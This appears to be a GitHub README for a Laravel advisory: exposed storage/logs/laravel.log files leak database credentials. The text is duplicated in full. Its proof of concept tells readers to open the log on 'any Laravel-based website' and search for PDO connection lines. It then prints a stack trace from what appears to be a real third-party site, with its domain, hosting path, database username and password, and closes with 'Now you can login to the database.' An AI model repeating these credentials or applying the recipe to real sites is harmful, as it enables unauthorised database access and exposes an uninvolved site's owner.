whiteman007/CVE-2024-29291

## CVE-2024-29291
CVE-ID: CVE-2024-29291

Description:

A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.

Additional Information:

None.

Risk:

High.

Vulnerability Type:

Database credential leak vulnerability.

Vendor of Product:

Laravel Framework.

Affected Product Code Base:

Laravel FRAMEWORK - 8.* - 11.*

Affected Component:

laravel.log.

Attack Type:

Remote.

Impact Information Disclosure:

True.

Attack Vectors:

Database credential leak vulnerability.

Description:

Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.

Proof of concept:

Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:

Username: u429384055_jscv
Password: Jaly$$a0p0p0p0

Host: sql1...

Now you can login to the database.

By: Huseein Amer
Facebook: https://www.facebook.com/hussein.amer.75491/
	CVE-ID: CVE-2024-29291

	Description:

	A vulnerability has been discovered in the Laravel Framework in versions from 8.* to 11.*, allowing a remote attacker to obtain sensitive information via the laravel.log component. This vulnerability leads to the leakage of database credentials.

	Additional Information:

	None.

	Risk:

	High.

	Vulnerability Type:

	Database credential leak vulnerability.

	Vendor of Product:

	Laravel Framework.

	Affected Product Code Base:

	Laravel FRAMEWORK - 8.* - 11.*

	Affected Component:

	laravel.log.

	Attack Type:

	Remote.

	Impact Information Disclosure:

	True.

	Attack Vectors:

	Database credential leak vulnerability.

	Description:

	Access to private Database credential data is possible by logging into the website database. Additionally, login data for database access can be retrieved.

	Proof of concept:

	Go to any Laravel-based website and navigate to storage/logs/laravel.log.
	Open the file and search for "PDO->__construct('mysql:host=".
	The result:
	shell
	Copy code
	#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
	#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
	Credentials:

	Username: u429384055_jscv
	Password: Jaly$$a0p0p0p0

	Host: sql1...

	Now you can login to the database.

	By: Huseein Amer
	Facebook: https://www.facebook.com/hussein.amer.75491/